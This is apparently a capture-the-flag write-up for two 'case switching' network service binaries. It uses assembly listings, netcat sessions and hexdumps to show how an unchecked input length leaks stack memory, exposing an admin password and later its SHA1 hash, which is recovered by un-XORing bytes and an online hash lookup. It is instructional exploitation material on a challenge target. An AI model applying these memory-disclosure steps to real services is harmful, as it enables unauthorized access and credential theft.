We are presented with two binaries that do almost the same thing. Let's see what exactly:
# ./caseservice pass 4242 Server-side debug: login password is set to [example] .... in another terminal: # nc 127.0.0.1 4242 ============================================== Welcome to the Case Switching service ============================================== Make your choice (1 or 2): 1. Use service 2. Configure service (only for administrators) 1 You selected [1] Input: input size and then <size> bytes 10 Bla bla bla Here you go: bLABLABL # nc 127.0.0.1 4242 ============================================== Welcome to the Case Switching service ============================================== Make your choice (1 or 2): 1. Use service 2. Configure service (only for administrators) 2 You selected [2] Configuration is done through a shell What is the administrator password? password Unauthorized login attempted.
So, as the name implies, it switches the case of the input. How does it do that? We turn to the assembly of the function named handle_use where we see this loop.
0x08048e16 <+116>: mov DWORD PTR [ebp-0xc],0x0 0x08048e1d <+123>: jmp 0x8048e41 <handle_use+159> 0x08048e1f <+125>: lea edx,[ebp-0x4c6] 0x08048e25 <+131>: mov eax,DWORD PTR [ebp-0xc] 0x08048e28 <+134>: add eax,edx 0x08048e2a <+136>: movzx eax,BYTE PTR [eax] 0x08048e2d <+139>: xor eax,0x20 0x08048e30 <+142>: lea ecx,[ebp-0x4c6] 0x08048e36 <+148>: mov edx,DWORD PTR [ebp-0xc] 0x08048e39 <+151>: add edx,ecx 0x08048e3b <+153>: mov BYTE PTR [edx],al 0x08048e3d <+155>: add DWORD PTR [ebp-0xc],0x1 0x08048e41 <+159>: mov eax,DWORD PTR [ebp-0x4cc] 0x08048e47 <+165>: cmp DWORD PTR [ebp-0xc],eax 0x08048e4a <+168>: jb 0x8048e1f <handle_use+125>
So it XORs with 0x20 all the input (regardless of whether the input is made of letters or numbers, symbols, etc). A question you should ask yourself is why does it need to know the input size? Let's try to fiddle with it:
# nc 127.0.0.1 4242 ============================================== Welcome to the Case Switching service ============================================== Make your choice (1 or 2): 1. Use service 2. Configure service (only for administrators) 1 You selected [1] Input: input size and then <size> bytes 10 A Here you go: ....... (binary)
Interesting how we get lots of unknown binary data out of it. Maybe there's something useful in there. Let's redirect to a file.
# nc 127.0.0.1 4242 > out 1 255 # hexdump -Cv out 00000000 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000010 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000020 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 57 |==============.W| 00000030 65 6c 63 6f 6d 65 20 74 6f 20 74 68 65 20 43 61 |elcome to the Ca| 00000040 73 65 20 53 77 69 74 63 68 69 6e 67 20 73 65 72 |se Switching ser| 00000050 76 69 63 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |vice.===========| 00000060 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000070 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000080 3d 3d 3d 0a 4d 61 6b 65 20 79 6f 75 72 20 63 68 |===.Make your ch| 00000090 6f 69 63 65 20 28 31 20 6f 72 20 32 29 3a 0a 31 |oice (1 or 2):.1| 000000a0 2e 20 55 73 65 20 73 65 72 76 69 63 65 0a 32 2e |. Use service.2.| 000000b0 20 43 6f 6e 66 69 67 75 72 65 20 73 65 72 76 69 | Configure servi| 000000c0 63 65 20 28 6f 6e 6c 79 20 66 6f 72 20 61 64 6d |ce (only for adm| 000000d0 69 6e 69 73 74 72 61 74 6f 72 73 29 0a 0a 59 6f |inistrators)..Yo| 000000e0 75 20 73 65 6c 65 63 74 65 64 20 5b 31 5d 0a 49 |u selected [1].I| 000000f0 6e 70 75 74 3a 20 69 6e 70 75 74 20 73 69 7a 65 |nput: input size| 00000100 20 61 6e 64 20 74 68 65 6e 20 3c 73 69 7a 65 3e | and then <size>| 00000110 20 62 79 74 65 73 0a 48 65 72 65 20 79 6f 75 20 | bytes.Here you | 00000120 67 6f 3a 0a 2a 97 20 20 20 20 18 c9 df 9f e9 13 |go:.*. ......| 00000130 f9 97 ec c8 df 9f 40 20 20 20 27 20 20 20 30 8a |......@ ' 0.| 00000140 e1 97 28 e0 24 28 e0 cf df 97 20 d9 df 97 20 20 |..(.$(.... ... | 00000150 20 20 b8 2e 22 20 20 30 20 20 26 71 e9 97 20 94 | .." 0 &q.. .| 00000160 f4 97 20 20 20 20 20 30 20 20 21 20 20 20 74 8e |.. 0 ! t.| 00000170 f4 97 28 e0 24 28 20 20 20 20 20 20 20 20 31 20 |..(.$( 1 | 00000180 20 20 28 e0 24 28 20 20 20 20 20 20 20 20 74 8e | (.$( t.| 00000190 f4 97 28 e0 24 28 20 20 20 20 a8 cd df 9f 5c f3 |..(.$( ....\.| 000001a0 e0 97 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |.. | 000001b0 20 20 a8 cd df 9f 50 0a df 97 20 20 20 20 74 8e | ....P... t.| 000001c0 f4 97 20 20 20 20 20 20 20 20 a8 cd df 9f bb ad |.. ......| 000001d0 24 28 28 e0 24 28 27 20 20 20 74 c9 df 9f 27 20 |$((.$(' t...' | 000001e0 20 20 20 20 20 20 e3 69 bc 07 09 53 2a 5f a0 5e | .i...S*_.^| 000001f0 db a6 56 89 0d eb 4f aa 1f af 45 58 41 4d 50 4c |..V...O...EXAMPL| 00000200 45 20 20 08 08 08 08 08 08 08 08 08 08 08 08 08 |E .............| 00000210 08 08 08 08 08 08 a1 a1 a1 a1 a1 a1 a1 a1 a1 a1 |................| 00000220 a1 a1 a1 |...| 00000223
There's our password with the switched case! Let's try on the remote system.
# hexdump -Cv out 00000000 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000010 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000020 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 57 |==============.W| 00000030 65 6c 63 6f 6d 65 20 74 6f 20 74 68 65 20 43 61 |elcome to the Ca| 00000040 73 65 20 53 77 69 74 63 68 69 6e 67 20 73 65 72 |se Switching ser| 00000050 76 69 63 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |vice.===========| 00000060 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000070 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000080 3d 3d 3d 0a 4d 61 6b 65 20 79 6f 75 72 20 63 68 |===.Make your ch| 00000090 6f 69 63 65 20 28 31 20 6f 72 20 32 29 3a 0a 31 |oice (1 or 2):.1| 000000a0 2e 20 55 73 65 20 73 65 72 76 69 63 65 0a 32 2e |. Use service.2.| 000000b0 20 43 6f 6e 66 69 67 75 72 65 20 73 65 72 76 69 | Configure servi| 000000c0 63 65 20 28 6f 6e 6c 79 20 66 6f 72 20 61 64 6d |ce (only for adm| 000000d0 69 6e 69 73 74 72 61 74 6f 72 73 29 0a 0a 59 6f |inistrators)..Yo| 000000e0 75 20 73 65 6c 65 63 74 65 64 20 5b 31 5d 0a 49 |u selected [1].I| 000000f0 6e 70 75 74 3a 20 69 6e 70 75 74 20 73 69 7a 65 |nput: input size| 00000100 20 61 6e 64 20 74 68 65 6e 20 3c 73 69 7a 65 3e | and then <size>| 00000110 20 62 79 74 65 73 0a 48 65 72 65 20 79 6f 75 20 | bytes.Here you | 00000120 67 6f 3a 0a 2a 97 20 20 20 20 18 c9 df 9f e9 13 |go:.*. ......| 00000130 f9 97 ec c8 df 9f 40 20 20 20 2c 20 20 20 30 8a |......@ , 0.| 00000140 e1 97 28 e0 24 28 e0 cf df 97 20 d9 df 97 20 20 |..(.$(.... ... | 00000150 20 20 b8 2e 22 20 20 30 20 20 26 71 e9 97 20 94 | .." 0 &q.. .| 00000160 f4 97 20 20 20 20 20 30 20 20 21 20 20 20 74 8e |.. 0 ! t.| 00000170 f4 97 28 e0 24 28 20 20 20 20 20 20 20 20 31 20 |..(.$( 1 | 00000180 20 20 28 e0 24 28 20 20 20 20 20 20 20 20 74 8e | (.$( t.| 00000190 f4 97 28 e0 24 28 20 20 20 20 a8 cd df 9f 5c f3 |..(.$( ....\.| 000001a0 e0 97 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |.. | 000001b0 20 20 a8 cd df 9f 50 0a df 97 20 20 20 20 74 8e | ....P... t.| 000001c0 f4 97 20 20 20 20 20 20 20 20 a8 cd df 9f bb ad |.. ......| 000001d0 24 28 28 e0 24 28 2c 20 20 20 74 c9 df 9f 27 20 |$((.$(, t...' | 000001e0 20 20 20 20 20 20 68 0e 5b fd 7b 7d 73 03 bc ac | h.[.{}s...| 000001f0 0a 3f 60 6f 4e 46 f9 c7 85 57 49 4e 54 45 4c 4c |.?`oNF...WINTELL| 00000200 49 47 45 4e 43 45 20 20 08 08 08 08 08 08 08 08 |IGENCE ........| 00000210 08 08 08 08 08 08 a1 a1 a1 a1 a1 a1 a1 a1 a1 a1 |................| 00000220 a1 a1 a1 |...| 00000223
So the password seems to be “wintelligence” but note that “EXAMPLE” in the first case was at offset 0x1fa. At 0x1fa in the second listing is “I” from “INTELLIGENCE” Trying “intelligence” works and we are able to log in.
This task is supposedly more secure. Let's see just how secure by doing almost the same thing as before through hexdump
# nc 127.0.0.1 4242 > out 1 255 # hexdump -Cv out 00000000 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000010 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000020 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 57 |==============.W| 00000030 65 6c 63 6f 6d 65 20 74 6f 20 74 68 65 20 43 61 |elcome to the Ca| 00000040 73 65 20 53 77 69 74 63 68 69 6e 67 20 73 65 72 |se Switching ser| 00000050 76 69 63 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |vice.===========| 00000060 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000070 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000080 3d 3d 3d 0a 4d 61 6b 65 20 79 6f 75 72 20 63 68 |===.Make your ch| 00000090 6f 69 63 65 20 28 31 20 6f 72 20 32 29 3a 0a 31 |oice (1 or 2):.1| 000000a0 2e 20 55 73 65 20 73 65 72 76 69 63 65 0a 32 2e |. Use service.2.| 000000b0 20 43 6f 6e 66 69 67 75 72 65 20 73 65 72 76 69 | Configure servi| 000000c0 63 65 20 28 6f 6e 6c 79 20 66 6f 72 20 61 64 6d |ce (only for adm| 000000d0 69 6e 69 73 74 72 61 74 6f 72 73 29 0a 0a 59 6f |inistrators)..Yo| 000000e0 75 20 73 65 6c 65 63 74 65 64 20 5b 31 5d 0a 49 |u selected [1].I| 000000f0 6e 70 75 74 3a 20 69 6e 70 75 74 20 73 69 7a 65 |nput: input size| 00000100 20 61 6e 64 20 74 68 65 6e 20 3c 73 69 7a 65 3e | and then <size>| 00000110 20 62 79 74 65 73 0a 48 65 72 65 20 79 6f 75 20 | bytes.Here you | 00000120 67 6f 3a 0a 2a df af 1f aa 4f a0 df 9a 97 74 8e |go:.*....O....t.| 00000130 f4 97 20 e0 24 28 20 30 22 20 48 e1 24 28 0d cc |.. .$( 0" H.$(..| 00000140 e1 97 68 98 f4 97 20 20 20 20 68 c9 df 9f e9 13 |..h... h.....| 00000150 f9 97 fc c8 df 9f 40 20 20 20 27 20 20 20 30 8a |......@ ' 0.| 00000160 e1 97 20 20 20 20 e0 cf df 97 20 d9 df 97 20 20 |.. .... ... | 00000170 20 20 b8 2e 22 20 20 30 20 20 26 71 e9 97 31 20 | .." 0 &q..1 | 00000180 20 20 20 90 dd 97 20 30 20 20 21 20 20 20 74 8e | ... 0 ! t.| 00000190 f4 97 28 e0 24 28 20 20 20 20 20 20 20 20 ae 9a |..(.$( ..| 000001a0 e1 97 28 e0 24 28 20 20 20 20 20 20 20 20 74 8e |..(.$( t.| 000001b0 f4 97 28 e0 24 28 20 20 20 20 58 cd df 9f 5c f3 |..(.$( X...\.| 000001c0 e0 97 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |.. | 000001d0 20 20 58 cd df 9f 50 0a df 97 20 20 20 20 74 8e | X...P... t.| 000001e0 f4 97 20 20 20 20 20 20 20 20 58 cd df 9f 1d ad |.. X.....| 000001f0 24 28 28 e0 24 28 27 20 20 20 50 c9 df 9f 68 20 |$((.$(' P...h | 00000200 20 20 20 20 20 20 20 20 20 20 20 20 20 20 03 02 | ..| 00000210 01 0a |..| 00000212
So even if we want 255 bytes it provides considerably less. Why is that? In task 1 handle_use ended like this:
0x08048e47 <+165>: cmp DWORD PTR [ebp-0xc],eax 0x08048e4a <+168>: jb 0x8048e1f <handle_use+125> 0x08048e4c <+170>: mov eax,DWORD PTR [ebp-0x4cc] 0x08048e52 <+176>: mov DWORD PTR [esp+0x8],eax 0x08048e56 <+180>: lea eax,[ebp-0x4c6] 0x08048e5c <+186>: mov DWORD PTR [esp+0x4],eax 0x08048e60 <+190>: mov eax,DWORD PTR [ebp+0x8] 0x08048e63 <+193>: mov DWORD PTR [esp],eax 0x08048e66 <+196>: call 0x8048ab0 <write@plt> 0x08048e6b <+201>: leave 0x08048e6c <+202>: ret
Task 3 ends it like this:
0x08048de6 <+162>: cmp DWORD PTR [ebp-0xc],eax 0x08048de9 <+165>: jb 0x8048dbe <handle_use+122> 0x08048deb <+167>: lea eax,[ebp-0x4c6] 0x08048df1 <+173>: mov DWORD PTR [esp],eax 0x08048df4 <+176>: call 0x80489f0 <puts@plt> 0x08048df9 <+181>: leave 0x08048dfa <+182>: ret
So instead of a write it does a puts stopping at the first NULL byte. We can bypass this by giving as input the exact amount of bytes until that NULL byte
Let's try 210 bytes.
# nc 127.0.0.1 4242 > out 1 255 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa # hexdump -Cv out 00000000 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000010 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000020 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 57 |==============.W| 00000030 65 6c 63 6f 6d 65 20 74 6f 20 74 68 65 20 43 61 |elcome to the Ca| 00000040 73 65 20 53 77 69 74 63 68 69 6e 67 20 73 65 72 |se Switching ser| 00000050 76 69 63 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |vice.===========| 00000060 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000070 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000080 3d 3d 3d 0a 4d 61 6b 65 20 79 6f 75 72 20 63 68 |===.Make your ch| 00000090 6f 69 63 65 20 28 31 20 6f 72 20 32 29 3a 0a 31 |oice (1 or 2):.1| 000000a0 2e 20 55 73 65 20 73 65 72 76 69 63 65 0a 32 2e |. Use service.2.| 000000b0 20 43 6f 6e 66 69 67 75 72 65 20 73 65 72 76 69 | Configure servi| 000000c0 63 65 20 28 6f 6e 6c 79 20 66 6f 72 20 61 64 6d |ce (only for adm| 000000d0 69 6e 69 73 74 72 61 74 6f 72 73 29 0a 0a 59 6f |inistrators)..Yo| 000000e0 75 20 73 65 6c 65 63 74 65 64 20 5b 31 5d 0a 49 |u selected [1].I| 000000f0 6e 70 75 74 3a 20 69 6e 70 75 74 20 73 69 7a 65 |nput: input size| 00000100 20 61 6e 64 20 74 68 65 6e 20 3c 73 69 7a 65 3e | and then <size>| 00000110 20 62 79 74 65 73 0a 48 65 72 65 20 79 6f 75 20 | bytes.Here you | 00000120 67 6f 3a 0a 41 41 41 41 41 41 41 41 41 41 41 41 |go:.AAAAAAAAAAAA| 00000130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000140 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000160 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000170 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000180 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000190 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001f0 41 41 41 41 41 41 2a 20 20 20 50 c9 df 9f 68 20 |AAAAAA* P...h | 00000200 20 20 20 20 20 20 20 20 20 20 20 20 20 20 03 02 | ..| 00000210 01 0a |..| 00000212
We seem to be needing 2 + 8 + 8 + 8 + 2 = 28 bytes to pass the NULL. So we try 238 bytes
# nc 127.0.0.1 4242 > out 1 255 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa # hexdump -Cv out 00000000 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000010 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000020 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 57 |==============.W| 00000030 65 6c 63 6f 6d 65 20 74 6f 20 74 68 65 20 43 61 |elcome to the Ca| 00000040 73 65 20 53 77 69 74 63 68 69 6e 67 20 73 65 72 |se Switching ser| 00000050 76 69 63 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |vice.===========| 00000060 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000070 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000080 3d 3d 3d 0a 4d 61 6b 65 20 79 6f 75 72 20 63 68 |===.Make your ch| 00000090 6f 69 63 65 20 28 31 20 6f 72 20 32 29 3a 0a 31 |oice (1 or 2):.1| 000000a0 2e 20 55 73 65 20 73 65 72 76 69 63 65 0a 32 2e |. Use service.2.| 000000b0 20 43 6f 6e 66 69 67 75 72 65 20 73 65 72 76 69 | Configure servi| 000000c0 63 65 20 28 6f 6e 6c 79 20 66 6f 72 20 61 64 6d |ce (only for adm| 000000d0 69 6e 69 73 74 72 61 74 6f 72 73 29 0a 0a 59 6f |inistrators)..Yo| 000000e0 75 20 73 65 6c 65 63 74 65 64 20 5b 31 5d 0a 49 |u selected [1].I| 000000f0 6e 70 75 74 3a 20 69 6e 70 75 74 20 73 69 7a 65 |nput: input size| 00000100 20 61 6e 64 20 74 68 65 6e 20 3c 73 69 7a 65 3e | and then <size>| 00000110 20 62 79 74 65 73 0a 48 65 72 65 20 79 6f 75 20 | bytes.Here you | 00000120 67 6f 3a 0a 41 41 41 41 41 41 41 41 41 41 41 41 |go:.AAAAAAAAAAAA| 00000130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000140 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000160 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000170 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000180 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000190 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000200 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000210 41 41 2a 69 bc 07 09 53 2a 5f a0 5e db a6 56 89 |AA*i...S*_.^..V.| 00000220 0d eb 4f 8a 3f 8f 03 02 01 0a |..O.?.....| 0000022a
To pass the next null byte we would need 238 + 6 + 8 + 8 + 2 = 262 bytes which is more than what we can send. Before doing assembly investigations let's do some dynamic analysis.
# ltrace ./caseservice_reload pass 4242 __libc_start_main(0x8048fab, 3, 0xbfffee84, 0x80491d0 <unfinished ...> fopen("pass", "r") = 0x804c008 fgets("example\n", 1000, 0x804c008) = 0xbfffe988 strlen("example\n") = 8 printf("Server-side debug: login passwor"..., "example"Server-side debug: login password is set to [example] ) = 54 SHA1(0xbfffe988, 7, 0xbfffe970, 72) = 0xbfffe970 fclose(0x804c008) = 0 atoi(0xbffff079, 0, 0x2cb4304e, 1) = 4242 socket(2, 1, 0) = 3 bzero(0xbfffedb8, 16) = <void> inet_addr("000.0.0.0") = 0 htons(4242, 16, 0, 1) = 0x9210 setsockopt(3, 1, 2, 0xbfffedcc) = 0 bind(3, 0xbfffedb8, 16, 0xbfffedcc) = 0 listen(3, 5, 16, 0xbfffedcc) = 0 accept(3, 0xbfffeda8, 0xbfffedc8, 0xbfffedcc) = 4 fork() = 18145 close(4) = 0 accept(3, 0xbfffeda8, 0xbfffedc8, 0xbfffedcc <no return ...> --- SIGCHLD (Child exited) ---
Notice the SHA1 hash call. If we look into handle_configure we see that the comparison (memcmp) is done against the hash of our input as well. Since the SHA1 of the correct password is done at every program start maybe it's still on the stack. Let's check the hash of “example”
# echo -n "example" | sha1sum
c3499c2729730a7f807efb8676a92dcb6f8a3f8f -
If we look at the beginning it doesn't seem to be in our hexdump. But the end is there:
00000220 0d eb 4f 8a 3f 8f 03 02 01 0a |..O.?.....|
Why would there be only 3 bytes? Remember the XOR function? 0x6f XOR 0x20 = 0x8f which is exactly the byte preceding these 3 bytes. Extrapolating, we see the whole hash with the first 17 bytes XORED thus easily recoverable.
Let's try remote:
# nc 127.0.0.1 4242 > out 1 255 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa # hexdump -Cv out 00000000 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000010 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000020 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 57 |==============.W| 00000030 65 6c 63 6f 6d 65 20 74 6f 20 74 68 65 20 43 61 |elcome to the Ca| 00000040 73 65 20 53 77 69 74 63 68 69 6e 67 20 73 65 72 |se Switching ser| 00000050 76 69 63 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |vice.===========| 00000060 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000070 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================| 00000080 3d 3d 3d 0a 4d 61 6b 65 20 79 6f 75 72 20 63 68 |===.Make your ch| 00000090 6f 69 63 65 20 28 31 20 6f 72 20 32 29 3a 0a 31 |oice (1 or 2):.1| 000000a0 2e 20 55 73 65 20 73 65 72 76 69 63 65 0a 32 2e |. Use service.2.| 000000b0 20 43 6f 6e 66 69 67 75 72 65 20 73 65 72 76 69 | Configure servi| 000000c0 63 65 20 28 6f 6e 6c 79 20 66 6f 72 20 61 64 6d |ce (only for adm| 000000d0 69 6e 69 73 74 72 61 74 6f 72 73 29 0a 0a 59 6f |inistrators)..Yo| 000000e0 75 20 73 65 6c 65 63 74 65 64 20 5b 31 5d 0a 49 |u selected [1].I| 000000f0 6e 70 75 74 3a 20 69 6e 70 75 74 20 73 69 7a 65 |nput: input size| 00000100 20 61 6e 64 20 74 68 65 6e 20 3c 73 69 7a 65 3e | and then <size>| 00000110 20 62 79 74 65 73 0a 48 65 72 65 20 79 6f 75 20 | bytes.Here you | 00000120 67 6f 3a 0a 41 41 41 41 41 41 41 41 41 41 41 41 |go:.AAAAAAAAAAAA| 00000130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000140 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000160 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000170 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000180 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000190 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000001f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000200 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000210 41 41 b6 81 c9 e2 a4 97 34 db b7 e5 d8 88 a8 97 |AA......4.......| 00000220 03 91 b9 33 a9 7e 03 02 01 0a |...3.~....| 0000022a
The interesting part is “b6 81 c9 e2 a4 97 34 db b7 e5 d8 88 a8 97 03 91 b9 33 a9 7e”. XORing the first bytes as discussed yields the hash: 96a1e9c284b714fb97c5f8a888b723b19933a97e Searching for this hash on google yields the password “horizonward” which works.